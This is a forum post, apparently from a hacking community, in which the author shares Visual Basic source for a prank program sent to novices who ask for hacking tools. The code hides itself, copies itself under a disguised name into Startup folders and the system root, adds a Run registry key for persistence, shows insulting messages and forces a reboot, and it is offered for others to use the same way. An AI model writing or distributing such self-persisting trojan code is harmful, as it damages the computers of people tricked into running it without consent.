Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
another day, another noob
sighs yet again i sign onto AIM ready to help people on HBH who have various computer problems, and i am greeted by another "can you teach me to hack" "i wanna hack aim passwords, emails and shit" messages.
Usally its my custom to be as helpful as possible so i always try to send them my uber_h4x0r_prog.exe.
Im pretty sure im not alone with these kinda situations, so i figured i'd share the source code to my uber_h4x0r_prog.exe Just incase anyone else wishes to use it the same way as i do:
Its a really simple program that took 3 seconds to write in VB:
Private Sub Form_Load()
On Error Resume Next
Me.Hide
App.TaskVisible = False
Dim Windir, Windir1, user As String
Windir1 = Environ("windir")
Windir = Right(Windir1, Len(Windir1) - 3)
user = Environ("username")
FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\Documents and Settings\All users\Start Menu\Programs\startup\Kernel35.exe"
FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\WINNT\Profiles\All users\Start Menu\Programs\Startup\Kernel35.exe"
FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\Documents and Settings\" & user & "\Start Menu\Programs\startup\Kernel35.exe"
FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\WINNT\Profiles\" & user & "\Start Menu\Programs\Startup\Kernel35.exe"
FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\AUTOEXEC.exe"
MsgBox "ERROR (xr174): Windows has detected a retarded user.", vbDefaultButton1, "ERROR: Retard detected"
MsgBox "Repeat after me: I will not ask people for shitty h4x0r programs.", vbDefaultButton1, "ERROR: Retard detected"
MsgBox "Repeat after me: I am a retarded noob.", vbDefaultButton1, "ERROR: Retard detected"
Call Shell("reg add hkey_local_machine\software\microsoft\" & Windir & "\currentversion\run /v systemGUI /t reg_sz /d C:\AUTOEXEC.exe /f", vbHide)
Call Shell("shutdown -f -r", vbHide)
End Sub